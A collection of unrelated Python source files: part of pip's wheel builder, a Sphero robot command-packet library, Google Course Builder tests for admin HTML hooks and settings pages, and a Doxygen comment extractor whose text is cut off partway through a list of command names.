] + list(self.global_options)
def __build_one(self, req, tempd, python_tag=None):
base_args = self._base_setup_args(req)
spin_message = 'Running setup.py bdist_wheel for %s' % (req.name,)
with open_spinner(spin_message) as spinner:
logger.debug('Destination directory: %s', tempd)
wheel_args = base_args + ['bdist_wheel', '-d', tempd] \
+ self.build_options
if python_tag is not None:
wheel_args += ["--python-tag", python_tag]
try:
call_subprocess(wheel_args, cwd=req.setup_py_dir,
show_stdout=False, spinner=spinner)
return True
except:
spinner.finish("error")
logger.error('Failed building wheel for %s', req.name)
return False
def _clean_one(self, req):
base_args = self._base_setup_args(req)
logger.info('Running setup.py clean for %s', req.name)
clean_args = base_args + ['clean', '--all']
try:
call_subprocess(clean_args, cwd=req.source_dir, show_stdout=False)
return True
except:
logger.error('Failed cleaning build dir for %s', req.name)
return False
def build(self, requirements, session, autobuilding=False):
"""Build wheels.
:param unpack: If True, replace the sdist we built from with the
newly built wheel, in preparation for installation.
:return: True if all the wheels built correctly.
"""
from pip._internal import index
building_is_possible = self._wheel_dir or (
autobuilding and self.wheel_cache.cache_dir
)
assert building_is_possible
buildset = []
for req in requirements:
if req.constraint:
continue
if req.is_wheel:
if not autobuilding:
logger.info(
'Skipping %s, due to already being wheel.', req.name,
)
elif autobuilding and req.editable:
pass
elif autobuilding and not req.source_dir:
pass
elif autobuilding and req.link and not req.link.is_artifact:
# VCS checkout. Build wheel just for this run.
buildset.append((req, True))
else:
ephem_cache = False
if autobuilding:
link = req.link
base, ext = link.splitext()
if index.egg_info_matches(base, None, link) is None:
# E.g. local directory. Build wheel just for this run.
ephem_cache = True
if "binary" not in index.fmt_ctl_formats(
self.finder.format_control,
canonicalize_name(req.name)):
logger.info(
"Skipping bdist_wheel for %s, due to binaries "
"being disabled for it.", req.name,
)
continue
buildset.append((req, ephem_cache))
if not buildset:
return True
# Build the wheels.
logger.info(
'Building wheels for collected packages: %s',
', '.join([req.name for (req, _) in buildset]),
)
_cache = self.wheel_cache # shorter name
with indent_log():
build_success, build_failure = [], []
for req, ephem in buildset:
python_tag = None
if autobuilding:
python_tag = pep425tags.implementation_tag
if ephem:
output_dir = _cache.get_ephem_path_for_link(req.link)
else:
output_dir = _cache.get_path_for_link(req.link)
try:
ensure_dir(output_dir)
except OSError as e:
logger.warning("Building wheel for %s failed: %s",
req.name, e)
build_failure.append(req)
continue
else:
output_dir = self._wheel_dir
wheel_file = self._build_one(
req, output_dir,
python_tag=python_tag,
)
if wheel_file:
build_success.append(req)
if autobuilding:
# XXX: This is mildly duplicative with prepare_files,
# but not close enough to pull out to a single common
# method.
# The code below assumes temporary source dirs -
# prevent it doing bad things.
if req.source_dir and not os.path.exists(os.path.join(
req.source_dir, PIP_DELETE_MARKER_FILENAME)):
raise AssertionError(
"bad source dir - missing marker")
# Delete the source we built the wheel from
req.remove_temporary_source()
# set the build directory again - name is known from
# the work prepare_files did.
req.source_dir = req.build_location(
self.preparer.build_dir
)
# Update the link for this.
req.link = index.Link(path_to_url(wheel_file))
assert req.link.is_wheel
# extract the wheel into the dir
unpack_url(
req.link, req.source_dir, None, False,
session=session,
)
else:
build_failure.append(req)
# notify success/failure
if build_success:
logger.info(
'Successfully built %s',
' '.join([req.name for req in build_success]),
)
if build_failure:
logger.info(
'Failed to build %s',
' '.join([req.name for req in build_failure]),
)
# Return True if all builds were successful
return len(build_failure) == 0
|
|
# coding: utf-8
import struct
import response
class Request(object):
SOP1 = 0xFF
SOP2 = 0xFF
did = 0x00
cid = 0x00
fmt = None
def __init__(self, seq=0x00, *data):
self.seq = seq
self.data = data
if not self.fmt:
self.fmt = '%sB' % len(self.data)
def __str__(self):
return self.bytes
def checksum(self):
body = self.packet_header() + self.packet_body()
body = struct.unpack('%sB' % len(body), body)
return struct.pack('B', ~(sum(body[2:]) % 256) & 0xFF)
@property
def bytes(self):
return self.packet_header() + self.packet_body() + self.checksum()
def packet_header(self):
return struct.pack('6B', *self.header())
def packet_body(self):
if not self.data:
return ''
return struct.pack(self.fmt, *self.data)
@property
def dlen(self):
return struct.calcsize(self.fmt) + 1
def header(self):
return [self.SOP1, self.SOP2, self.did, self.cid, self.seq, self.dlen]
def response(self, header, body):
name = self.__class__.__name__.split('.')[-1]
klass = getattr(response, name, response.Response)
return klass(header, body)
class Core(Request):
did = 0x00
class Ping(Core):
cid = 0x01
class GetVersion(Core):
cid = 0x02
class SetDeviceName(Core):
cid = 0x10
class GetBluetoothInfo(Core):
cid = 0x11
class GetAutoReconnect(Core):
cid = 0x12
class SetAutoReconnect(Core):
cid = 0x13
class GetPowerState(Core):
cid = 0x20
class SetPowerNotification(Core):
cid = 0x21
class Sleep(Core):
cid = 0x22
class GetVoltageTripPoints(Core):
cid = 0x23
class SetVoltageTripPoints(Core):
cid = 0x24
class SetInactivityTimeout(Core):
cid = 0x25
class JumpToBootloader(Core):
cid = 0x30
class PerformLevel1Diagnostics(Core):
cid = 0x40
class PerformLevel2Diagnostics(Core):
cid = 0x41
class ClearCounters(Core):
cid = 0x42
class SetTimeValue(Core):
cid = 0x50
class PollPacketTimes(Core):
cid = 0x51
#Sphero Commands
class Sphero(Request):
did = 0x02
class SetHeading(Sphero):
cid = 0x01
fmt = '!H'
class SetStabilization(Sphero):
cid = 0x02
class SetRotationRate(Sphero):
cid = 0x03
class SetApplicationConfigurationBlock(Sphero):
cid = 0x04
class GetApplicationConfigurationBlock(Sphero):
cid = 0x05
class ReenableDemoMode(Sphero):
cid = 0x06
class GetChassisId(Sphero):
cid = 0x07
class SetChassisId(Sphero):
cid = 0x08
class SelfLevel(Sphero):
cid = 0x09
class SetVDL(Sphero):
cid = 0x0A
class SetDataStreaming(Sphero):
cid = 0x11
class ConfigureCollisionDetection(Sphero):
cid = 0x12
class Locator(Sphero):
cid = 0x13
class SetAccelerometer(Sphero):
cid = 0x14
class ReadLocator(Sphero):
cid=0x15
class SetRGB(Sphero):
cid = 0x20
class SetBackLEDOutput(Sphero):
cid = 0x21
class GetRGB(Sphero):
cid = 0x22
class Roll(Sphero):
fmt = '!BHB' #Speed, heading, state
cid = 0x30
class SetBoostWithTime(Sphero):
cid = 0x31
class SetRawMotorValues(Sphero):
cid = 0x33
class SetMotionTimeout(Sphero):
cid = 0x34
class SetOptionFlags(Sphero):
cid = 0x35
class GetOptionFlags(Sphero):
cid = 0x36
class GetConfigurationBlock(Sphero):
cid = 0x40
class GetDeviceMode(Sphero):
cid = 0x42
class RunMacro(Sphero):
cid = 0x50
class SaveTemporaryMacro(Sphero):
cid = 0x51
class ReinitMacro(Sphero):
cid = 0x54
class AbortMacro(Sphero):
cid = 0x55
class GetMacroStatus(Sphero):
cid = 0x56
class SetMacroParameter(Sphero):
cid = 0x57
class AppendMacroChunk(Sphero):
cid = 0x58
class EraseOrbbasicStorage(Sphero):
cid = 0x60
class AppendOrbbasicFragment(Sphero):
cid = 0x61
class RunOrbbasicProgram(Sphero):
cid = 0x62
class AbortOrbbasicProgram(Sphero):
cid = 0x63
class AnswerInput(Sphero):
cid = 0x64
|
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that walk through Course Builder pages."""
__author__ = 'Mike Gainer (mgainer@google.com)'
import cgi
import re
import urllib
from common import crypto
from common import utils as common_utils
from controllers import sites
from controllers import utils
from models import courses
from models import models
from models import transforms
from modules.courses import settings
from modules.dashboard import filer
from modules.i18n_dashboard import i18n_dashboard
from tests.functional import actions
from tests.functional.actions import assert_contains
COURSE_NAME = 'admin_settings'
COURSE_TITLE = 'Admin Settings'
ADMIN_EMAIL = 'admin@foo.com'
NAMESPACE = 'ns_%s' % COURSE_NAME
BASE_URL = '/' + COURSE_NAME
ADMIN_SETTINGS_URL = '/%s%s' % (
COURSE_NAME, settings.HtmlHookRESTHandler.URI)
TEXT_ASSET_URL = '/%s%s' % (
COURSE_NAME, filer.TextAssetRESTHandler.URI)
STUDENT_EMAIL = 'student@foo.com'
SETTINGS_URL = '/%s/dashboard?action=settings_admin_prefs' % COURSE_NAME
class AdminSettingsTests(actions.TestBase):
def setUp(self):
super(AdminSettingsTests, self).setUp()
actions.simple_add_course(COURSE_NAME, ADMIN_EMAIL, COURSE_TITLE)
actions.login(ADMIN_EMAIL)
def test_defaults(self):
prefs = models.StudentPreferencesDAO.load_or_default()
self.assertEquals(False, prefs.show_hooks)
class WelcomePageTests(actions.TestBase):
def setUp(self):
super(WelcomePageTests, self).setUp()
self.auto_deploy = sites.ApplicationContext.AUTO_DEPLOY_DEFAULT_COURSE
sites.ApplicationContext.AUTO_DEPLOY_DEFAULT_COURSE = False
def tearDown(self):
sites.ApplicationContext.AUTO_DEPLOY_DEFAULT_COURSE = self.auto_deploy
super(WelcomePageTests, self).tearDown()
def test_welcome_page(self):
actions.login(ADMIN_EMAIL, is_admin=True)
response = self.get('/')
self.assertEqual(response.status_int, 302)
self.assertEqual(
response.headers['location'],
'http://localhost/admin/welcome')
response = self.get('/admin/welcome?action=welcome')
assert_contains('Welcome to Course Builder', response.body)
assert_contains('action="/admin/welcome"', response.body)
assert_contains('Start Using Course Builder', response.body)
def test_welcome_page_button(self):
actions.login(ADMIN_EMAIL, is_admin=True)
response = self.post('/admin/welcome', {})
self.assertEqual(response.status_int, 302)
self.assertEqual(
response.headers['location'],
'http://localhost/modules/admin')
class HtmlHookTest(actions.TestBase):
def setUp(self):
super(HtmlHookTest, self).setUp()
self.app_context = actions.simple_add_course(COURSE_NAME, ADMIN_EMAIL,
COURSE_TITLE)
self.course = courses.Course(None, self.app_context)
actions.login(ADMIN_EMAIL, is_admin=True)
self.xsrf_token = crypto.XsrfTokenManager.create_xsrf_token(
settings.HtmlHookRESTHandler.XSRF_ACTION)
def tearDown(self):
the_settings = self.course.get_environ(self.app_context)
the_settings.pop('foo', None)
the_settings['html_hooks'].pop('foo', None)
self.course.save_settings(the_settings)
super(HtmlHookTest, self).tearDown()
def test_hook_edit_button_presence(self):
# Turn preference on; expect to see hook editor button
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_hooks = True
models.StudentPreferencesDAO.save(prefs)
response = self.get(BASE_URL)
self.assertIn('gcb-html-hook-edit', response.body)
# Turn preference off; expect editor button not present.
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_hooks = False
models.StudentPreferencesDAO.save(prefs)
response = self.get(BASE_URL)
self.assertNotIn('gcb-html-hook-edit', response.body)
def test_non_admin_permissions_failures(self):
actions.login(STUDENT_EMAIL)
student_xsrf_token = crypto.XsrfTokenManager.create_xsrf_token(
settings.HtmlHookRESTHandler.XSRF_ACTION)
response = self.get(ADMIN_SETTINGS_URL)
self.assertEquals(200, response.status_int)
payload = transforms.loads(response.body)
self.assertEquals(401, payload['status'])
self.assertEquals('Access denied.', payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'key': 'base:after_body_tag_begins',
'xsrf_token': cgi.escape(student_xsrf_token),
'payload': '{}'})})
payload = transforms.loads(response.body)
self.assertEquals(401, payload['status'])
self.assertEquals('Access denied.', payload['message'])
response = self.delete(ADMIN_SETTINGS_URL + '?xsrf_token=' +
cgi.escape(student_xsrf_token))
self.assertEquals(200, response.status_int)
payload = transforms.loads(response.body)
self.assertEquals(401, payload['status'])
self.assertEquals('Access denied.', payload['message'])
def test_malformed_requests(self):
response = self.put(ADMIN_SETTINGS_URL, {})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Missing "request" parameter.', payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': 'asdfasdf'})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Malformed "request" parameter.', payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token)})})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Request missing "key" parameter.',
payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': 'base:after_body_tag_begins'})})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Request missing "payload" parameter.',
payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': 'base:after_body_tag_begins',
'payload': 'asdfsdfasdf'})})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Malformed "payload" parameter.',
payload['message'])
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': 'base:after_body_tag_begins',
'payload': '{}'})})
payload = transforms.loads(response.body)
self.assertEquals(400, payload['status'])
self.assertEquals('Payload missing "hook_content" parameter.',
payload['message'])
def test_get_unknown_hook_content(self):
# Should be safe (but unhelpful) to ask for no hook.
response = transforms.loads(self.get(ADMIN_SETTINGS_URL).body)
payload = transforms.loads(response['payload'])
self.assertIsNone(payload['hook_content'])
def test_get_defaulted_hook_content(self):
url = '%s?key=%s' % (
ADMIN_SETTINGS_URL, cgi.escape('base.after_body_tag_begins'))
response = transforms.loads(self.get(url).body)
self.assertEquals(200, response['status'])
self.assertEquals('Success.', response['message'])
payload = transforms.loads(response['payload'])
self.assertEquals('<!-- base.after_body_tag_begins -->',
payload['hook_content'])
def test_page_has_defaulted_hook_content(self):
response = self.get(BASE_URL)
self.assertIn('<!-- base.after_body_tag_begins -->', response.body)
def test_set_hook_content(self):
html_text = '<table><tbody><tr><th>;<></th></tr></tbody></table>'
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': 'base.after_body_tag_begins',
'payload': transforms.dumps(
{'hook_content': html_text})})})
self.assertEquals(200, response.status_int)
response = transforms.loads(response.body)
self.assertEquals(200, response['status'])
self.assertEquals('Saved.', response['message'])
# And verify that the changed text appears on course pages.
# NOTE that text is as-is; no escaping of special HTML
# characters should have been done.
response = self.get(BASE_URL)
self.assertIn(html_text, response.body)
def test_delete_default_content_ineffective(self):
response = self.get(BASE_URL)
self.assertIn('<!-- base.after_body_tag_begins -->', response.body)
url = '%s?key=%s&xsrf_token=%s' % (
ADMIN_SETTINGS_URL, cgi.escape('base.after_body_tag_begins'),
cgi.escape(self.xsrf_token))
response = transforms.loads(self.delete(url).body)
self.assertEquals(200, response['status'])
self.assertEquals('Deleted.', response['message'])
response = self.get(BASE_URL)
self.assertIn('<!-- base.after_body_tag_begins -->', response.body)
def test_manipulate_non_default_item(self):
html_text = '<table><tbody><tr><th>;<></th></tr></tbody></table>'
new_hook_name = 'html.some_new_hook'
# Verify that content prior to setting is blank.
url = '%s?key=%s&xsrf_token=%s' % (
ADMIN_SETTINGS_URL, cgi.escape(new_hook_name),
cgi.escape(self.xsrf_token))
response = transforms.loads(self.get(url).body)
payload = transforms.loads(response['payload'])
self.assertIsNone(payload['hook_content'])
# Set the content.
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': new_hook_name,
'payload': transforms.dumps(
{'hook_content': html_text})})})
self.assertEquals(200, response.status_int)
response = transforms.loads(response.body)
self.assertEquals(200, response['status'])
self.assertEquals('Saved.', response['message'])
# Verify that content after setting is as expected
url = '%s?key=%s&xsrf_token=%s' % (
ADMIN_SETTINGS_URL, cgi.escape(new_hook_name),
cgi.escape(self.xsrf_token))
response = transforms.loads(self.get(url).body)
payload = transforms.loads(response['payload'])
self.assertEquals(html_text, payload['hook_content'])
# Delete the content.
response = transforms.loads(self.delete(url).body)
self.assertEquals(200, response['status'])
self.assertEquals('Deleted.', response['message'])
# Verify that content after setting is None.
url = '%s?key=%s&xsrf_token=%s' % (
ADMIN_SETTINGS_URL, cgi.escape(new_hook_name),
cgi.escape(self.xsrf_token))
response = transforms.loads(self.get(url).body)
payload = transforms.loads(response['payload'])
self.assertIsNone(payload['hook_content'])
def test_add_new_hook_to_page(self):
hook_name = 'html.my_new_hook'
html_text = '<table><tbody><tr><th>;<></th></tr></tbody></table>'
key = 'views/base.html'
url = '%s?key=%s' % (
TEXT_ASSET_URL, cgi.escape(key))
# Get base page template.
response = transforms.loads(self.get(url).body)
xsrf_token = response['xsrf_token']
payload = transforms.loads(response['payload'])
contents = payload['contents']
# Add hook specification to page content.
contents = contents.replace(
'<body data-gcb-page-locale="{{ page_locale }}">',
'<body data-gcb-page-locale="{{ page_locale }}">\n' +
'{{ html_hooks.insert(\'%s\') | safe }}' % hook_name)
self.put(TEXT_ASSET_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(xsrf_token),
'key': key,
'payload': transforms.dumps({'contents': contents})})})
# Verify that new hook appears on page.
response = self.get(BASE_URL)
self.assertIn('id="%s"' % re.sub('[^a-zA-Z-]', '-', hook_name),
response.body)
# Verify that modified hook content appears on page
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': hook_name,
'payload': transforms.dumps(
{'hook_content': html_text})})})
response = self.get(BASE_URL)
self.assertIn(html_text, response.body)
def test_student_admin_hook_visibility(self):
actions.login(STUDENT_EMAIL, is_admin=False)
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_hooks = True
models.StudentPreferencesDAO.save(prefs)
response = self.get(BASE_URL)
self.assertNotIn('gcb-html-hook-edit', response.body)
actions.login(ADMIN_EMAIL, is_admin=True)
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_hooks = True
models.StudentPreferencesDAO.save(prefs)
response = self.get(BASE_URL)
self.assertIn('gcb-html-hook-edit', response.body)
def test_hook_i18n(self):
actions.update_course_config(
COURSE_NAME,
{
'html_hooks': {'base': {'after_body_tag_begins': 'foozle'}},
'extra_locales': [
{'locale': 'de', 'availability': 'available'},
]
})
hook_bundle = {
'content': {
'type': 'html',
'source_value': '',
'data': [{
'source_value': 'foozle',
'target_value': 'FUZEL',
}],
}
}
hook_key = i18n_dashboard.ResourceBundleKey(
utils.ResourceHtmlHook.TYPE, 'base.after_body_tag_begins', 'de')
with common_utils.Namespace(NAMESPACE):
i18n_dashboard.ResourceBundleDAO.save(
i18n_dashboard.ResourceBundleDTO(str(hook_key), hook_bundle))
# Verify non-translated version.
response = self.get(BASE_URL)
dom = self.parse_html_string(response.body)
html_hook = dom.find('.//div[@id="base-after-body-tag-begins"]')
self.assertEquals('foozle', html_hook.text)
# Set preference to translated language, and check that that's there.
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.locale = 'de'
models.StudentPreferencesDAO.save(prefs)
response = self.get(BASE_URL)
dom = self.parse_html_string(response.body)
html_hook = dom.find('.//div[@id="base-after-body-tag-begins"]')
self.assertEquals('FUZEL', html_hook.text)
# With no translation present, but preference set to foreign language,
# verify that we fall back to the original language.
# Remove translation bundle, and clear cache.
with common_utils.Namespace(NAMESPACE):
i18n_dashboard.ResourceBundleDAO.delete(
i18n_dashboard.ResourceBundleDTO(str(hook_key), hook_bundle))
i18n_dashboard.ProcessScopedResourceBundleCache.instance().clear()
response = self.get(BASE_URL)
dom = self.parse_html_string(response.body)
html_hook = dom.find('.//div[@id="base-after-body-tag-begins"]')
self.assertEquals('foozle', html_hook.text)
def test_hook_content_found_in_old_location(self):
actions.update_course_config(COURSE_NAME, {'foo': {'bar': 'baz'}})
self.assertEquals(
'baz', utils.HtmlHooks.get_content(self.course, 'foo.bar'))
def test_insert_on_page_and_hook_content_found_using_old_separator(self):
the_settings = self.course.get_environ(self.app_context)
the_settings['html_hooks']['foo'] = {'bar': 'baz'}
self.course.save_settings(the_settings)
hooks = utils.HtmlHooks(self.course)
content = hooks.insert('foo:bar')
self.assertEquals('<div class="gcb-html-hook" id="foo-bar">baz</div>',
str(content))
def test_hook_content_new_location_overrides_old_location(self):
actions.update_course_config(COURSE_NAME,
{'html_hooks': {'foo': {'bar': 'zab'}}})
actions.update_course_config(COURSE_NAME,
{'foo': {'bar': 'baz'}})
self.assertEquals(
'zab', utils.HtmlHooks.get_content(self.course, 'foo.bar'))
def test_hook_rest_edit_removes_from_old_location(self):
actions.update_course_config(COURSE_NAME,
{'html_hooks': {'foo': {'bar': 'zab'}}})
actions.update_course_config(COURSE_NAME,
{'foo': {'bar': 'baz'}})
response = self.put(ADMIN_SETTINGS_URL, {'request': transforms.dumps({
'xsrf_token': cgi.escape(self.xsrf_token),
'key': 'foo.bar',
'payload': transforms.dumps({'hook_content': 'BAZ'})})})
env = self.course.get_environ(self.app_context)
self.assertNotIn('bar', env['foo'])
self.assertEquals('BAZ', env['html_hooks']['foo']['bar'])
def test_hook_rest_delete_removes_from_old_and_new_location(self):
actions.update_course_config(COURSE_NAME,
{'html_hooks': {'foo': {'bar': 'zab'}}})
actions.update_course_config(COURSE_NAME,
{'foo': {'bar': 'baz'}})
url = '%s?key=%s&xsrf_token=%s' % (
ADMIN_SETTINGS_URL, cgi.escape('foo.bar'),
cgi.escape(self.xsrf_token))
self.delete(url)
env = self.course.get_environ(self.app_context)
self.assertNotIn('bar', env['foo'])
self.assertNotIn('bar', env['html_hooks']['foo'])
class JinjaContextTest(actions.TestBase):
def setUp(self):
super(JinjaContextTest, self).setUp()
actions.simple_add_course(COURSE_NAME, ADMIN_EMAIL, COURSE_TITLE)
actions.login(ADMIN_EMAIL, is_admin=True)
def _get_jinja_context_text(self, response):
root = self.parse_html_string(response.text)
div = root.find('body/div[last()-1]')
return ''.join(div.itertext())
def test_show_jinja_context_presence(self):
# Turn preference on; expect to see context dump.
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_jinja_context = True
models.StudentPreferencesDAO.save(prefs)
self.assertIn('is_read_write_course:',
self._get_jinja_context_text(self.get(BASE_URL)))
# Turn preference off; expect context dump not present.
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_jinja_context = False
models.StudentPreferencesDAO.save(prefs)
self.assertNotIn('is_read_write_course:',
self._get_jinja_context_text(self.get(BASE_URL)))
def test_student_jinja_context_visibility(self):
actions.login(STUDENT_EMAIL, is_admin=False)
with common_utils.Namespace(NAMESPACE):
prefs = models.StudentPreferencesDAO.load_or_default()
prefs.show_jinja_context = True
models.StudentPreferencesDAO.save(prefs)
self.assertNotIn('is_read_write_course:',
self._get_jinja_context_text(self.get(BASE_URL)))
class ExitUrlTest(actions.TestBase):
def setUp(self):
super(ExitUrlTest, self).setUp()
actions.simple_add_course(COURSE_NAME, ADMIN_EMAIL, COURSE_TITLE)
actions.login(ADMIN_EMAIL, is_admin=True)
def test_exit_url(self):
base_url = '/%s/dashboard?action=settings_data_pump' % COURSE_NAME
url = base_url + '&' + urllib.urlencode({
'exit_url': 'dashboard?%s' % urllib.urlencode({
'action': 'data_pump'})})
response = self.get(url)
self.assertIn(
'cb_global.exit_url = \'dashboard?action=data_pump',
response.body)
|
|
"""
Fixed and improved version based on "extracting from C++ doxygen documented file Author G.D." and py++ code.
Distributed under the Boost Software License, Version 1.0. (See
accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
Extensively modified by C.M. Bruns April 2010.
"""
import re
from pygccxml import declarations
import unittest
import unicodedata
class doxygen_doc_extractor:
"""
Extracts Doxygen styled documentation from source or generates it from description.
"""
def __init__(self):
#for caching source
self.file_name = None
self.source = None
#__init__
def __call__(self, declaration):
if self.file_name != declaration.location.file_name:
self.file_name = declaration.location.file_name
self.source = open(declaration.location.file_name).readlines()
self.declaration = declaration
find_block_end = False
doc_lines = []
# First look for a same-line documentation:
same_line_index = declaration.location.line - 1 # off by one issue
line = self.source[same_line_index]
# print declaration, same_line_index, line
doc = extract_same_line_doc(line)
doc = clear_str(doc)
# print declaration, line
if doc:
# print """found same line documentation:
# %s
# '%s'""" % (line, doc)
if doc:
doc_lines.insert(0, doc)
# return self.finalize_doc_lines(doc_lines)
# Next look for a doxygen comment above the declaration
# Is there a pure comment line directly above the declaration?
line_index = declaration.location.line - 2
# March backwards in the file looking for comments, avoiding other declarations
while (line_index >= 0):
line = self.source[line_index]
if might_be_doxygen_comment_end_line(line):
break
if line.find(';') >= 0: # another declaration
break
line_index -= 1
if (line_index < 0):
return self.finalize_doc_lines(doc_lines) # Only blanks above declaration
line = self.source[line_index]
# print "investigating '%s'" % line
# print line_index
if not might_be_doxygen_comment_end_line(line):
# print "not end comment"
return self.finalize_doc_lines(doc_lines) # no doxygen comment here
# We need to know whether we are within a C-style comment "... */"
doc_lines.extend(self.grab_doxygen_comment(line_index))
return self.finalize_doc_lines(doc_lines)
#__call__()
def grab_doxygen_comment(self, line_index):
"""Returns a list of doxygen comments ending at line line_index"""
doc_lines = []
if line_index < 0:
return doc_lines
line = self.source[line_index]
# "///" lines are definitely doxygen comments
# print "checking line '%s'" % line
if is_cpp_comment_line(line):
# print "is cpp comment"
doc_lines.insert(0, clear_str(line))
# print "cpp comment", doc_lines
doc_lines = self.grab_doxygen_comment(line_index - 1) + doc_lines
elif is_c_end_comment(line):
# print "is c end comment"
doc_lines = self.grab_c_comment(line_index) + doc_lines
elif is_oneline_c_comment(line):
# print "is oneline c comment"
doc_lines.insert(0, clear_str(line))
doc_lines = self.grab_doxygen_comment(line_index - 1) + doc_lines
# print "one line C comment", doc_lines
return doc_lines
def grab_c_comment(self, line_index):
"""Returns a multiline c-style doxygen comment ending at line line_index"""
doc_lines = []
doc_lines.append(clear_str(self.source[line_index])) # final line of comment
while True:
line_index -= 1
if line_index < 0:
raise IndexError('End comment without start')
break
line = self.source[line_index]
doc_lines.insert(0, clear_str(line))
if is_c_start_comment(line):
break
if is_c_nondoxygen_start_comment(line):
return []
# print "C comment", doc_lines
more_comment = self.grab_doxygen_comment(line_index - 1)
# print "more comment = ", more_comment, self.source[line_index - 1]
return self.grab_doxygen_comment(line_index - 1) + doc_lines
def is_code(self, tmp_str):
"""
Detects if tmp_str is code or not
"""
try:
beg = tmp_str.lstrip()[:2]
return beg != "//" and beg != "/*"
except:
pass
return False
#is_code()
def finalize_doc_lines(self, doc_lines):
if not doc_lines:
return None
final_doc_lines = [ line.replace("\n","\\n") for line in doc_lines[:-1] ]
final_doc_lines.append(doc_lines[-1].replace("\n",""))
# remove blank lines at the beginning and end
while final_doc_lines and final_doc_lines[0] == "":
final_doc_lines = final_doc_lines[1:]
while final_doc_lines and final_doc_lines[-1] == "":
final_doc_lines = final_doc_lines[:-1]
# class docstrings should start and end with a blank line
# http://www.python.org/dev/peps/pep-0257/
if declarations.is_class(self.declaration):
# print "is class", self.declaration
final_doc_lines.append("")
final_doc_lines.insert(0, "")
pass
result = '\"' + '\\n'.join(final_doc_lines) + '\"'
if isinstance( result, unicode ):
result = unicodedata.normalize('NFKD', result).encode('ascii','ignore')
assert isinstance(result, str)
return result
def clear_str(tmp_str):
"""
Replace */! by space and \brief, @fn, \param, etc
"""
if not tmp_str:
return None
# Keep indentation on left, but only after comment characters
# Remove initial spaces followed by comment characters of any kind
tmp_str = re.sub(r'^\s*[/*!]+', '', tmp_str)
# Remove final spaces and comment characters
tmp_str = re.sub(r'[/*]+$', '', tmp_str)
tmp_str = re.sub(r'\s+$', '', tmp_str)
# Remove "@brief" statements
tmp_str = re.sub(r'^(\s*)[\\@]brief\s?', r'\1', tmp_str)
tmp_str = reduce(clean, [tmp_str, "\\fn","@fn","\\ref","@ref", "\"", "\'", "\\c"])
# Transform param statements to epydoc format
tmp_str = re.sub(r'[@\\]param\s+([^ :]+):?', r'@param \1:', tmp_str)
# Transform \p doxyygen parameter references to epydoc C{} code font
tmp_str = re.sub(r'\\[apc]\s(\S+)', r'C{\1}', tmp_str)
# Convert html lists to epydoc lists
tmp_str = re.sub(r'<(li|LI)>', ' - ', tmp_str)
tmp_str = re.sub(r'</(li|LI)>', '', tmp_str)
tmp_str = re.sub(r'</?(ul|UL|ol|OL)>', '', tmp_str)
# Convert doxygen \par headings to epydoc sections
m = re.match(r'^(\s*)\\par\s+(\S?.*\S)\s*$', tmp_str)
if m:
tmp_str = (m.group(1) + m.group(2) + "\n" + # Theory:
m.group(1) + len(m.group(2)) * "-") # -------
# Smooth over unicode conversion errors here, rather than waiting
# for trouble at Py++ source code generation time.
tmp_str = unicode(tmp_str, errors='ignore')
#commands list taken form : http://www.stack.nl/~dimitri/doxygen/commands.html
replacement_list = [
# "a",
"addindex",
"addtogroup",
"anchor",
"arg",
"attention",
"author",
# "b",
# "brief",
"bug",
# "c",
"callgraph",
"callergraph",
"category",
"class",
("code","[Code]"),
"cond",
"copybrief",
"copydetails",
"copydoc",
"date",
"def",
"defgroup",
"deprecated",
"details",
"dir",
"dontinclude",
("dot","[Dot]"),
"dotfile",
"e",
"else",
"elseif",
"em",
("endcode","[/Code]"),
"endcond",
("enddot","[/Dot]"),
"endhtmlonly",
"endif",
"endlatexonly",
"endlink",
"endmanonly",
"endmsc",
"endverbatim",
"endxmlonly",
"enum",
"example",
"exception",
"extends",
"f$",
"f[",
"f]",
"f{",
"f}",
"file",
# "fn",
"headerfile",
"hideinitializer",
"htmlinclude",
"htmlonly",
"if",
"ifnot",
"image",
"implements",
"include",
